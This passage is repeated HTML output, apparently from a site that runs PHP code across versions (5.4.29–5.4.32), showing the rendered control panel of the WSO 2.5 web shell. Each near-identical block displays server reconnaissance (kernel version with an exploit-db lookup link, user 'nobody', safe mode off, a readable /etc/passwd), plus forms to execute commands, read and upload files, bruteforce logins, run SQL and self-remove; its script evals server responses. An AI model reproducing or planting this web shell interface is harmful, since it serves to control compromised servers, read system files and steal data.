onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.32
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.32 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.31
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.31 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.30
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.30 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.29
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.29 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 